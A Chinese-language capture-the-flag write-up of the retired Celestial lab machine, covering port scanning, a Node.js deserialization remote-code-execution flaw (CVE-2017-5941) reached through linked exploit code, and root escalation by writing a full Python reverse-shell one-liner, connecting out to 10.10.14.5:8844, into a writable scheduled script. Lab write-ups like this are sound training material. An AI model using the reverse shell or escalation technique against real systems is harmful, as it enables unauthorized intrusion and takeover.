本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.85
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.85 -o ./Celestial-autorecon
就开了个3000端口,访问看看
再刷新一下看到上面信息,看下burpsuite的请求信息
发现base64编码信息,解码一下得到上述明文,随便改个数字3在burpsuite上配置编码为base64得到如下报错信息
看显示是跟nodejs有关,搜索了下对应名称是否含有漏洞,确认存在反序列化远程代码执行漏洞,参考链接:https://help.aliyun.com/knowledge_detail/50422.html 再搜索下exploit ,具体exploit地址:https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/
exploit代码:
https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py
具体操作如下:
成功反弹shell,获取了user.txt信息,尝试提权,执行了sudo -l需要无果,看到当前目录含有一个脚本
显示脚本是在运行,下载pspy到目标靶机执行得到如下结果
确认文件script.py可以写入文件,使用vi编辑器写入反弹代码
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.5",8844));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
等待反弹shell,差不多等了5-10分钟成功反弹shell
